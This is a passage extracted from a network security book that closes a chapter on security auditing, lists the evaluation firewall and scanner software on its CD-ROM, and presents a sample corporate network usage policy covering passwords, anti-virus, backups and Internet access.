\nFavorite Keys tab allows you to indicate which keys you find most interesting. You can then select the Favorite \nKeys tab to view all your favorite keys in a single area. This saves you from having to search the Registry every \ntime you wish to check their permission settings. \nAnother useful icon is the Report Manager. The Report Manager allows you to create custom reports and \nselectively choose which information is reported in each. For example, you could create a single report that \nidentifies all the services running on every server, as well as error log entries. This allows you to quickly verify the \nhealth of all your network services. 
\nPutting the Results to Use \nOnce you have your audit, it is now time to focus on your problem areas and get them resolved. KSA is an \nexcellent tool because it does not give you a false sense of security. Systems are verified based on the security \npolicy you input into the software. This means that you are not checking your systems against some arbitrary \nstandard. You are verifying which systems are in compliance with your security policy and which ones are not. \nThis allows the tool to be molded for any networking environment. \n \nSummary \nIn this chapter we discussed how you can stay better informed of exploits as they are found. \nWe discussed what vendor and third-party resources are available for investigating \nvulnerabilities and where to find patches. We also discussed which mailing lists and \nnewsgroups are available if you need to find out more information. Finally, we looked at how \nto perform a security audit on your network and what tools are available to aid you in this task. \n \n \n \n \n \n \n" }, { "page_number": 366, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 366\nAppendix A: About the CD-ROM \nThis CD-ROM contains security software products that will enable you to identify vulnerable points \nin your network and secure your business against malicious attack. Sybex provides these products \nfor its readers through exclusive partnerships with the software companies involved. Installation \ninformation is presented below; where indicated, review the readme files that accompany each \nproduct for more information. \nNote \nYou will need Windows NT 4 to install these products on your machine. \nFireWall-1 \nIncluded on the CD is a fully functioning, 30-day evaluation copy of the industry-leading \nfirewall and security suite, FireWall-1, from Check Point Software Technologies, Ltd. FireWall-\n1 is available for the following operating systems: \nƒ Windows NT 4 \nƒ Windows 2000 \nƒ Red Hat Linux 6.1 \nƒ Sun Solaris 2.6, 7 \nƒ HP-UX 10.20, 11.0 \nƒ AIX 4.2.1, 4.3.2, 4.3.3 \nNote \nFor security reasons, you cannot install or activate your fully functioning \nevaluation copy of FireWall-1 until you have received a certification key from \nCheck Point. E-mail sales@checkpoint.com to receive this key. \nCheck Point has included complete documentation on FireWall-1, available in PDF format for \nAcrobat Reader. These user manuals are located in the FireWall-1/ Docs/Userguid \nfolder on the CD-ROM. To begin, open the gs.pdf file and read \"Getting Started with Check \nPoint FireWall-1.\" \nNote \nIf you don’t have Acrobat Reader, you can install it directly from the CD-ROM. \nThe setup files are located in the FireWall-1/Docs/Pdfread folder; choose the \nappropriate setup for your operating system. \nTo install FireWall-1 on Windows NT 4, simply double-click the setup.exe file in the FireWall-1 \nfolder on the CD and the Installshield Wizard will guide you through the installation process. \nWarning \nDo not install firewall demo products on production servers! They can restrict \nservice to the machines so that you will not be able to log in correctly or use \nthe machines for any other purpose. \n \nGuardian \nIncluded on the CD is a fully functioning, 30-day evaluation copy of the award-winning \nGuardian firewall from NetGuard, Inc. Double-click the setup.exe file in the NetGuard folder \non the CD to install the program. 
For details about Guardian's installation or operation, you can skim through the 158-page User's Manual that is included on the CD in PDF format.

Warning
Do not install firewall demo products on production servers! They can restrict service to the machines so that you will not be able to log in correctly or use the machines for any other purpose.

If you still have questions about the installation or operation of the Guardian firewall, contact NetGuard, Inc. at

NetGuard, Inc.
2445 Midway Road
Building 2
Carrollton, Texas 75006
972-738-6900
sales@netguard.com
www.netguard.com

Internet Scanner
Internet Security Systems, Inc. (ISS) has provided an evaluation copy of Internet Scanner, its complete network security vulnerability detection system. Double-click the setup.exe file located in the ISS folder on the CD.

Note
For security purposes, and due to the powerful nature of ISS's Internet Scanner, the company requires that you use an encrypted license key in order to fully evaluate the product. To obtain an extended evaluation key from Internet Security Systems, e-mail the company with your request at sales@iss.net. In the e-mail, please include your name, mailing and e-mail addresses, phone number, and the IP address range of your network. A license key will be e-mailed to you as soon as possible. You can also contact ISS by phone at (888) 901-7477.

Network Monitoring Suite (NMS)
Included on the CD is a fully functioning, 30-day evaluation copy of Lanware, Inc.'s Network Monitoring Suite (NMS). NMS is a software package designed to monitor the performance of critical elements of your network, including routers, hubs, Windows NT workstations, and Windows NT and UNIX servers. You must fill out the form at www.lanware.net/download/eval/nms_registration.asp in order to request and receive a 30-day license for NMS.

Double-click the setup.exe file located in the Lanware folder on the CD to install the program. If you have any questions about the installation or operation of NMS, contact Lanware, Inc. at

Lanware, Inc.
sales@lanware.net
www.lanware.net

WinZip
WinZip Computing (formerly Nico Mak Computing, Inc.) has provided a shareware evaluation copy of WinZip, its popular compression/decompression program. To install this product, locate the setup.exe file in the WinZip folder on the CD and double-click it.

Note
You will need WinZip to install some of the other products included on this CD.

Appendix B: Sample Network Usage Policy
This appendix provides a sample network usage policy. Bear in mind, however, that usage policies are ideally process-driven; they go through several steps that form a never-ending cycle as business needs and technology change.

Note
The following links are two examples of actual usage policies.
The first is corporate, the second is for an educational institution:

www.oit.gatech.edu/security/policy/usage/contents.html
www.dmtnet.com/Internetpolicy/policy.pdf

Principles behind an Effective Network Usage Policy
There are two principles traditionally used to justify network usage policies:

Total Cost of Ownership (TCO)
TCO includes measuring employee productivity versus resource utilization.

Employee Productivity Networks exist to ease the transfer of information, thereby making workers more productive. Ideally this productivity can be measured, which allows management to tie appropriate network usage to productivity goals.

Resource Utilization The utilization of resources within a company must be suitably justified. Network activities that do not contribute to the bottom line simply cannot be justified from a cost perspective. Usage policies help define which activities are a justifiable use of resources; all other activities are automatically prohibited.

Risk Mitigation
Policies reduce risk by defining those network activities that unjustifiably expose the company to liability, threaten sensitive information, or open the organization to negative publicity:

Liability Traditionally considered the domain of discrimination or sexual harassment, liability issues have expanded to include any communication that would result in the company being held liable.

Sensitive Information Any information that would provide an advantage to a competitor; such information is often the subject of intense scrutiny from rivals.

Negative Publicity Any communication or use of resources that would lead to a negative image of an organization. Negative publicity often has a direct impact on an organization's revenue flow due to lost sales and reduced stock value.

The Developmental Process
The process of fine-tuning a usage policy for a specific organization goes through many phases:

Discovery This first step is ideally performed with input from all levels of an organization that use the network. This not only produces a comprehensive policy, but also eases employee support and education efforts. Typical questions are:

• What company roles (or individuals) need access?
• Which specific network services do they need?
• What are the current methods of access (including time and location)?
• Which core business applications are Internet-integrated?
• What constitutes sensitive data?
• What are the measurable productivity goals, and how do network resources achieve those goals?
• What risks to network (and information) resources exist (e.g., corporate espionage, liability, and negative publicity)?
• What are the legal issues surrounding employee monitoring vs. privacy?

Definition The second step synthesizes the information collected in the first step to create the policy.
Topics include the following:

• Definitions of acceptable use as they fit into the overall company vision/mission, core business processes/applications, and individual/collective roles
• Definitions and examples of sensitive data, processes, and resources
• Risks to data, including corporate espionage, liability, and negative publicity
• Declaration of intent to monitor employee communication, along with definitions and examples of appropriate private communication and employee consent procedures
• Consequences of policy violation, including the penalty and appeal process
• Procedures for complaint about and/or modification of the policy
• Methods of disseminating the policy

Implementation The third step is to implement the policy. Implementation fundamentally consists of two steps:

• Disseminate the policy and educate the employees
• Enforce the policy

Review The final step is to review the effectiveness of the policy against the two principles underlying it, namely Total Cost of Ownership and risk mitigation. If the policy is not effective in satisfying these principles, the process is run again.

The sample policy that follows has been developed for Fubar Corporation. Fubar makes a wide range of desktop applications, including FuMeeting, its premier meeting scheduler, and FuHR, an employee database system. There is a main office in New York, as well as a small sales office located in San Diego. The sales office is connected to the main office via a 128K Frame Relay connection. The corporate office also has a T1 connection to the Internet.

There are more than 200 employees working out of the corporate office; about half of them are programmers. Fubar has a very modern telecommuting policy and allows each programmer to work from home one day a week. In addition, Fubar's sales personnel spend a lot of time on the road doing presentations and making sales calls. Because so many employees spend time working away from the office, Fubar has deployed two remote-access solutions: remote access is provided via a dial-in modem pool, as well as over the Internet using special VPN software.

The sensitivity of the information entering the network via remote connections is considered moderate. Since the programmers are working on the latest program code, Fubar could lose its business edge if this information were to fall into the hands of a competitor. Additionally, the sales information is considered sensitive because this data could give a competitor clues about new product releases.

Scope
The scope of this document is to define the company policies on proper network usage. The corporate network is a substantial investment toward profitability. It exists in order to improve employee productivity and to increase workflow efficiency.
The components of the network are considered to be

• All cabling used for carrying voice and electronic information
• All devices used for controlling the flow of said voice and electronic information
• All computer components, including (but not limited to) monitors, cases, storage devices, modems, network cards, memory chips, keyboards, mice, and cables
• All computer software
• All output devices, including printers and fax machines

Disciplinary action for failure to comply with any of the policy guidelines described in this document will be rendered on a per-incident basis. The company reserves the right to seek legal action when local, state, or federal laws have been broken or when financial loss has been incurred.

Network Management
All network maintenance, including configuration changes to desktop systems, is to be performed solely by the operations staff. Employees or contractors who are not members of the operations staff are not allowed to make system modifications, even to the workstations issued to them by the company. Any of the following activities would be considered a modification to the system:

• Patching a system's network drop to a new location
• Using a system's floppy drive to boot an alternative operating system
• Removing a system's case or cover
• Installing any software package, including software downloaded from the Internet

Hardware management is restricted in order to insure that warranties are not inadvertently voided and that security precautions are not circumvented. Software installation is restricted in order to insure that the company remains in compliance with software licensing laws. It also insures that proper support for the software can be provided by the internal operations staff and that software incompatibilities are avoided.

Password Requirements
Each employee will be issued a unique logon name in order to gain access to network resources. Every logon name will also have an associated password. The password provides verification that only the authorized user may access network resources using this unique logon name. It is the responsibility of every employee to insure that his or her password remains secret. Passwords are to be used under the following guidelines:

• Passwords are to be a minimum of six alphanumeric characters.
• Passwords cannot consist of common words or variations on the employee's name, logon name, server name, or company name.
• The employee will be required to change his or her password every 60 days. If the employee does not do so, his or her account will be disabled. In order to reactivate a disabled account, the employee must have his or her direct supervisor contact the network operations staff.
• During authentication, the employee will have three attempts at entering his or her password correctly. If all three attempts fail, the account will be disabled. In order to reactivate the account, the employee must have his or her direct supervisor contact the network operations staff.
• Every company computer is required to use a screen saver that activates after 15 minutes of inactivity. Once the screen saver becomes active, it should require that the user again authenticate with the system before gaining access.
\nƒ For accessing the network remotely, either through the dial-in modem pool or through an \nInternet-based Virtual Private Network (VPN), the employee will be issued a security \ntoken which will produce a new password every 60 seconds. The password generated by \nthe security token is to be used when the employee is accessing the network remotely. \n" }, { "page_number": 371, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 371\nƒ Passwords are to be kept private. The employee is expected to not write down his or her \npassword or share it with other individuals. The exception is that an employee will \nsurrender his or her password if requested to do so in the presence of his or her direct \nsupervisor and a member of human resources. \nƒ When accessing resources outside of the corporate network, the employee is required to \nuse a different password from the one used for internal systems. This is to insure that \ncritical password strings are not transmitted over public networks. Any questions about \nwhich systems are internal to the corporate network should be directed to the employee’s \ndirect supervisor or a member of the network operations staff. \nƒ The company reserves the right to hold the employee liable for damages caused by the \nemployee’s failure to protect the confidentially of his or her password in accordance with \nthe above guidelines. \nA strong password policy insures that all network resources remain secure. \nVirus Prevention Policy \nAll computer resources are to be protected by anti-virus software. It is the responsibility of the \nemployee to insure that the virus software running on his or her system is not disabled or \ncircumvented. If the employee receives any type of warning from the anti-virus software \nrunning on the system, he or she is to immediately cease using the system and contact a \nmember of the network operations staff or his or her direct supervisor. \nIt is the responsibility of the network operations staff to keep all anti-virus software up to date. \nThis will be performed through an automated process while the employee is connected to \nnetwork resources. Employees who suspect that their anti-virus software has not been \nupdated in the last 60 days should contact a member of the network operations staff. \n \nWorkstation Backup Policy \nOn a weekly basis, the network operations staff will perform a backup of documents stored on \neach employee’s workstation. Every employee is assigned a day of the week during which he \nor she must leave his or her system powered up at the end of the day. The employee is to log \noff of the system, but the system must remain powered up. It is the responsibility of the \nemployee to insure that his or her system remains powered up on the correct day. Employees \nshould contact their direct supervisor to find out which day they have been assigned. \nWhen an employee’s workstation is backed up, only documents within the \nC:\\My Documents \ndirectory will be saved. Documents stored in any other directory will be ignored. The employee \nbears responsibility for insuring that he or she saves all documents to this directory. All \ncompany-issued applications are designed to save file information to this directory by default. \nWorkstation Backup Policy \nOn a weekly basis, the network operations staff will perform a backup of documents stored on \neach employee’s workstation. 
Virus Prevention Policy
All computer resources are to be protected by anti-virus software. It is the responsibility of the employee to insure that the virus software running on his or her system is not disabled or circumvented. If the employee receives any type of warning from the anti-virus software running on the system, he or she is to immediately cease using the system and contact a member of the network operations staff or his or her direct supervisor.

It is the responsibility of the network operations staff to keep all anti-virus software up to date. This will be performed through an automated process while the employee is connected to network resources. Employees who suspect that their anti-virus software has not been updated in the last 60 days should contact a member of the network operations staff.

Workstation Backup Policy
On a weekly basis, the network operations staff will perform a backup of documents stored on each employee's workstation. Every employee is assigned a day of the week during which he or she must leave his or her system powered up at the end of the day. The employee is to log off of the system, but the system must remain powered up. It is the responsibility of the employee to insure that his or her system remains powered up on the correct day. Employees should contact their direct supervisor to find out which day they have been assigned.

When an employee's workstation is backed up, only documents within the C:\My Documents directory will be saved. Documents stored in any other directory will be ignored. The employee bears responsibility for insuring that he or she saves all documents to this directory. All company-issued applications are designed to save file information to this directory by default.

General Internet Access Policy
Company network resources, including those used to gain access to Internet-based sites, are only to be used for the express purpose of performing work-related duties. This policy is to insure the effective use of networking resources and shall apply equally to all employees. Direct supervisors may approve the use of network resources beyond the scope of this limited access policy when said use meets the following conditions:

• The intended use of network resources is incidental.
• The intended use of network resources does not interfere with the employee's regular duties.
• The intended use of network resources serves a legitimate company interest.
• The intended use of network resources is for educational purposes and within the scope of the employee's job function.
• The intended use of network resources does not break any local, state, or federal laws.
• The intended use of network resources will not overburden the network.

Internet Web Site Access Policy
When accessing an Internet-based Web site, employees are to use a Web browser that meets the corporate standard. This standard requires the use of Internet Explorer 5.5 with the following configuration:

• There are no additional plug-ins.
• Java, JavaScript, and ActiveX have been disabled.
• Cookies have been disabled.

These settings are to insure that the employee does not inadvertently load a malicious application while browsing Internet Web sites. Failure to comply with these security settings can result in the loss of Internet access privileges. Web browser software should only be installed by network operations personnel. In order to maintain proper software licensing, employees are prohibited from retrieving browser software or upgrades from any other source. Any employee who is unsure whether his or her browser meets these company standards should contact network operations.

Internet Mail and Newsgroup Access Policy
Inbound and outbound Internet mail messages are limited to a maximum size of 8MB. Any employee who needs to transfer a file that exceeds this limit should contact the network operations group for access to the corporate FTP server. This limitation is enforced in order to insure that one oversized e-mail message does not affect the flow of all corporate messages.

All messages transmitted to Internet-based mailing lists or newsgroups should include a company disclaimer as part of each message.
The required disclaimer is “The opinions expressed in this message do not reflect the views of my employer.” The company reserves the right to monitor these transmissions and discard any messages that do not include this disclaimer.

Personal Internet-Based Accounts
Company network resources may not be used to access personal Internet-based accounts. These include (but are not limited to)

• Personal e-mail accounts
• Personal shell accounts
• Personal accounts with a service provider such as AOL or CompuServe

Personal accounts on online services should not be accessed from company systems. This does not include company-based accounts or subscriptions that may exist on Internet-based systems. Access to corporate accounts is considered acceptable, provided that access falls within an employee's job duties.

Additional Information
All queries regarding information within this document, as well as issues that have not been specifically covered, should be directed to the employee's immediate supervisor. The immediate supervisor is responsible for relaying all queries to network operations or human resources, whichever is more appropriate.